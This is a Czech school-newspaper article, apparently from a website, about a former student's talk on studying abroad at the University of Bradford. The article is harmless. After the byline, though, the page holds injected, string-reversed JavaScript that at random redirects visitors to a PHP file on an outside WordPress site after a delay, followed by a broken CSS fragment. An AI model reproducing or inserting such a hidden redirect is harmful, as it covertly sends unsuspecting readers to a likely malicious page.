Po maturitě do zahraničí? Neztratíme se!

Téma druhého článku autorů z Grafomanu, který byl publikovaný 25. ledna v týdeníku Strakonicko, se opět týká všeho studentstva. Tentokrát však nejde o Pamlskovou vyhlášku, nýbrž o vysokoškolské studium za hranicemi Česka.

Na Tři krále se na strakonické gymnázium vrátil loňský maturant Lukáš Beneš. Zavítal k nám jen na pár hodin, ale zanechal v mnohých studentech včetně mě hluboký dojem v podobě úvah nad budoucností – blízkou i vzdálenou. Lukášovy přednášky se zúčastnili studenti třetích a čtvrtých ročníků. Každému z nás se totiž v hlavě čím dál, tím častěji vynořuje klíčová otázka: Kam po maturitě?

Lukáš se rozhodl využít toho, že coby student jen o málo starší než jeho publikum má středoškolské strasti a zmatky stále v živé paměti. V jeho přednášce nešlo ani tak o předání životních mouder a porovnávání univerzit či vysokých škol jako o zdůraznění věcí často podceňovaných, a přitom zásadních – schopností jednotlivce, rozvoje ducha i těla a síly odhodlání. Nelze vyjmenovat všechny otázky, s nimiž se studenti nejen před maturitou potýkají, ani vlivy, které je nakonec vychýlí tím či oním směrem. S Lukášem jsme se však mimo jiné zaobírali jedním z těch „větších“ problémů: Studovat v Česku, nebo v zahraničí?

Široké povědomí o různých kulturách, jež získáváme ze škol i médií, a internet, univerzální spojení takřka s kýmkoli na světě, by měly studentům rozhodování usnadnit. Znát kulturu a strávit v jejím centru pár měsíců či let jsou ovšem zcela odlišné věci, a tak spousta z nás stále váhá a pochybuje. Lukáš, který se odstěhoval do Anglie, aby mohl studovat finanční ekonomii na Bradfordské univerzitě, ke svému rozhodnutí také nedospěl hned. Při zvažování delšího pobytu v zahraničí přemýšlíme o tom, jestli se vůbec vyplatí a jak dobře si poradíme s odloučením od rodiny a přátel, s jazykovou bariérou a samostatností, včetně potenciálních problémů s financemi. Právě tehdy, a vlastně po celý život, se vyplatí nazírat na situaci tak, jako to ostatně udělal i Lukáš. Rozhodnout se, odvážit se a jít si za svým cílem.

Že to zní pateticky? Není. Po překonání strachu z neznámého je hlavní překážka obvykle cizí jazyk. Ačkoliv se na nás ze všech stran hrnou cizojazyčné výrazy a důležitým faktorem je náš vlastní zájem, Lukáš zdůrazňuje užitečnost znalosti gramatiky. Drtivá většina z nás začíná na základní škole s angličtinou a dále v ní pokračuje. Třebaže kvalitativně se výuka na různých školách liší, v České republice existuje množství příležitostí naučit se dobře anglicky nehledě na pokročilost, a to jak při různých agenturách, tak u rodilých mluvčích. Nutno dodat, že mnozí zahraniční kantoři hovoří velmi dobrou spisovnou angličtinou právě proto, že rodilými mluvčími nejsou. A domluvíme-li se, seženeme ubytování i práci.

Lukáš neopomněl zmínit, že jeho spolužáci jsou otevření, ochotní si kdykoli navzájem pomoci. Kromě Angličanů se setkává s vrstevníky z Číny, Jižní Korey, USA, Španělska nebo Rumunska – vlastně odevšad. Pevně věřím, že nikdo z nás se v zahraničí neztratí.

Alžběta Poskočilová

$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == „string“) return $cFN$wEpyMrNXtezaeR2.list[n].split(„“).reverse().join(„“);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[„‚php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}to; padding: 0px 4px 0px 0px; text-align: center; font: bold 11px/20px ‚Helvetica Neue‘,Helvetica,sans-serif; color: #ffffff; background: #bd081c no-repeat scroll 3px 50% / 14px 14px; position: absolute; opacity: 1; z-index: 8675309; display: none; cursor: pointer;“>Uložit

Napsat komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *